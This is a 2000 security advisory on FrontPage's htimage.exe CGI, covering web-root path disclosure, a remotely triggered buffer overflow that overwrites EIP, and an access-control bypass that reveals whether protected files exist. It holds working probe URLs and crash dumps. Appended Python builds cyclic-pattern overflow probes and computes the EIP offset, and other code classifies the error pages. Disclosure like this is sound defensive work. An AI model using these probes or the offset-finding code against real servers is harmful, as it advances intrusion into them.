ADV-150400.txt

23 Apr 2000, reported by Narrow
Type: packetstorm
Source: packetstormsecurity.com

CERN Image Map Dispatcher (htimage.exe, installed by FrontPage) has three problems: it discloses the full filesystem path of the web root, it has a remotely triggerable buffer overflow that overwrites EIP, and it opens files that the web server itself refuses to serve.

-------[ Legion2000 - Russian Security Team (ADV-150400#1) ]-------
www.legion2000.cc  
  
---- INFORMATION ----  
Program Name : CERN Image Map Dispatcher  
Discovered By : Narrow ([email protected])  
---------------------  
  
  
Problem Description  
~~~~~~~~~~~~~~~~~~  
CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with FrontPage. I found three bugs
in "htimage.exe": 1) it gives us the full path to the web root directory, 2) a simple buffer overflow
in the path handling, and 3) it lets us open files on the server that the web server itself will not serve.
  
  
Problem #1  
~~~~~~~~~  
Like I said, the first bug gives us the full path to the root directory. I tested this vulnerability
against a number of servers, and all of them were vulnerable.
  
Tested / Vulnerable FP Servers: 3.0.2.926 (FrontPage'98), 3.0.2.1706, 4.0.2.2717, 2.0.1.927, 3.0.2.926,
3.0.2.1105, 3.0.2.1330, 3.0.2.1117 (All Windows based web servers are vulnerable if we have permission
to execute "htimage.exe" and "htimage.exe" exists).
  
To test this vulnerability we need "htimage.exe" in the "cgi-bin" directory (it is installed by default)
and permission to execute it. That is why only Windows is affected: "htimage.exe" is a Windows binary, and
Unix based systems do not execute "*.exe" files.
  
If we request a map file that does not exist through "htimage.exe", for example: http://server/cgi-bin/htimage.exe/linux?0,0
the error page lists every location it tried, including the absolute one:
  
------------------------------------------------------------------------------------  
Error  
  
Error calling HTImage:  
  
Picture config file not found, tried the following:  
  
q:/hidden_directory_because_of_the_script_kiddies/webroot/linux  
/linux  
------------------------------------------------------------------------------------  
  
Now we know that the full path to the root directory is "q:/hidden_directory_because_of_the_script_kiddies/webroot/" (the name "linux" is arbitrary; any file that does not exist produces the same listing).
  
Problem #2  
~~~~~~~~~  
Like I said, the second bug is a simple buffer overflow. Tested against "Microsoft-PWS-95/2.0" and "FrontPage-PWS32".
Tested / Vulnerable OS: Windows'95/98
"htimage.exe" overflows if we request it with an over-long path: http://server/cgi-bin/htimage.exe/<741 A's>?0,0.
The page fault dialog on the server shows EIP overwritten with 0x41414141 ("AAAA"):
  
------------------------------------------------------------------------------------  
HTIMAGE caused an invalid page fault in  
module <unknown> at 0000:41414141.  
Registers:  
EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246
EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4  
ECX=0054015c DS=013f ESI=005401a0 FS=3467  
EDX=bff76648 ES=013f EDI=00540184 GS=0000  
Bytes at CS:EIP:  
  
Stack dump:  
bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28  
0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c  
------------------------------------------------------------------------------------  
<Server still running> + <500 Server Error>: only the htimage.exe process dies; the web server keeps running and the client receives a 500 Server Error.
  
First remote FrontPage exploit?  
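The crash above proves that bytes from the request reach EIP, but with 741 identical bytes it cannot say which four. The following added example (mine, not part of the Legion2000 advisory or of any FrontPage code) generalises the probe: it builds the same URL shape with a non-repeating pattern in place of the A's and, given the EIP value read from the fault dialog, returns the offset of those four bytes in the request. The host name, the probe length and the function names are assumptions; nothing here contacts a server, and locating the offset does not by itself give working code execution.

```python
import string
import struct
from urllib.parse import quote

# Assumed host for the probe URL; the advisory only writes "server".
HOST = "server"
PROBE_LEN = 741          # length the advisory reports as crashing htimage.exe


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style pattern Aa0Aa1Aa2...: no two uppercase letters are
    adjacent (so it never contains "AAAA"), and every 4-byte window is unique
    within the first 20280 bytes, which is what makes the offset search work."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def build_probe_url(host: str, payload: bytes) -> str:
    """Same URL shape as the advisory: /cgi-bin/htimage.exe/<payload>?0,0."""
    return f"http://{host}/cgi-bin/htimage.exe/{quote(payload)}?0,0"


def eip_from_dialog(line: str) -> int:
    """Parse the EIP=xxxxxxxx field out of a Windows fault-dialog register line."""
    for field in line.split():
        if field.startswith("EIP="):
            return int(field[4:], 16)
    raise ValueError("no EIP field in register line")


def eip_offset(pattern: bytes, eip: int) -> int:
    """Return the offset in `pattern` of the four bytes that became EIP,
    or -1 if EIP was not taken from our input. x86 is little-endian, so the
    dialog's 0x41414141 corresponds to b"AAAA" in memory order."""
    return pattern.find(struct.pack("<I", eip))


if __name__ == "__main__":
    pattern = cyclic_pattern(PROBE_LEN)
    print(build_probe_url(HOST, pattern))
    # Constructed register line in the format the advisory quotes; the all-A
    # crash cannot be located, so this prints -1.
    dialog = "EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246"
    print(eip_offset(pattern, eip_from_dialog(dialog)))
```

Send the pattern URL instead of the A's, read the new EIP from the dialog, and `eip_offset` tells you which bytes of PATH_INFO overwrite it; the same function returns -1 for the advisory's 0x41414141, which is exactly why the all-A probe only proves control and not placement.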
  
  
Problem #3  
~~~~~~~~~  
It is not a serious bug on its own. Using "htimage.exe" we can open files on the server that the web server refuses
to serve, but we cannot read their contents. Requesting "htimage.exe" like: http://server/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0
outputs:
  
------------------------------------------------------------------------------------  
Error  
  
Error calling HTImage:  
  
HTImage.c: Syntax error at line 1 Bad field name, expecting 'default', 'rectangle', 'circle' or  
'polygon' (got an alphanumeric string)  
------------------------------------------------------------------------------------  
  
NOTE: Requesting "/_vti_pvt/service.pwd" directly returns 403 Forbidden, so "htimage.exe" bypasses the web server's access control to open and parse the file. Because a file that does not exist produces "Picture config file not found" instead, the two error messages also tell us whether any given path under the web root exists.
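As an added example for Problems #1 and #3 (my code, not the advisory's), here is an offline classifier for the two htimage.exe error pages quoted above: it recovers the web root from the "tried the following" listing, and it turns the status of a direct request plus the htimage response for the same path into a verdict on whether the path exists and whether the CGI opened something the server refused to serve. The sample bodies are constructed from the error text in this advisory; the HTTP status codes and the function names are assumptions.

```python
import re
from typing import Optional

# Constructed sample bodies, taken from the error text quoted in the advisory.
NOT_FOUND_BODY = """Error

Error calling HTImage:

Picture config file not found, tried the following:

q:/hidden_directory_because_of_the_script_kiddies/webroot/linux
/linux
"""

SYNTAX_ERROR_BODY = """Error

Error calling HTImage:

HTImage.c: Syntax error at line 1 Bad field name, expecting 'default', 'rectangle', 'circle' or
'polygon' (got an alphanumeric string)
"""

TRIED_RE = re.compile(r"tried the following:\s*(.*)", re.S)
PATH_LINE_RE = re.compile(r"^(?:[A-Za-z]:)?/\S+$", re.M)


def disclosed_webroot(body: str, probed_name: str) -> Optional[str]:
    """Problem #1: the 'tried the following' listing names every location
    htimage looked in, absolute paths included. Strip the name we asked for
    from the first candidate that is longer than the bare name to recover
    the web root; None if nothing leaked."""
    m = TRIED_RE.search(body)
    if not m:
        return None
    suffix = "/" + probed_name
    for path in PATH_LINE_RE.findall(m.group(1)):
        if path.endswith(suffix) and len(path) > len(suffix):
            return path[: -len(probed_name)]
    return None


def classify_file_probe(direct_status: int, via_status: int, via_body: str) -> str:
    """Problem #3: compare a direct request for a path with the same path
    handed to htimage.exe as PATH_INFO. The status code of the htimage error
    page is an assumption; the verdict keys on the quoted error text."""
    if "Picture config file not found" in via_body:
        return "absent"                   # htimage could not open the file
    if "HTImage.c: Syntax error" in via_body:
        if direct_status == 403:
            return "exists-acl-bypassed"  # server refuses it, CGI opened and parsed it
        return "exists"
    if via_status >= 500:
        return "cgi-crashed"              # see Problem #2
    return "unknown"


if __name__ == "__main__":
    print(disclosed_webroot(NOT_FOUND_BODY, "linux"))
    print(classify_file_probe(403, 200, SYNTAX_ERROR_BODY))
```

The "exists-acl-bypassed" verdict is the one worth alerting on: the web server said 403, yet the CGI running under the server's own account opened and parsed the file, so the server's per-path ACL is not the last line of defence for anything under the web root.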
  
Solution  
~~~~~~~  
1) Remove "htimage.exe" from "cgi-bin" (or at least deny execute permission on it).
2) Do not use FrontPage, simple enough :)
  
Comments  
~~~~~~~  
Sorry for my bad English, it is not my mother/father language ;)
  
  
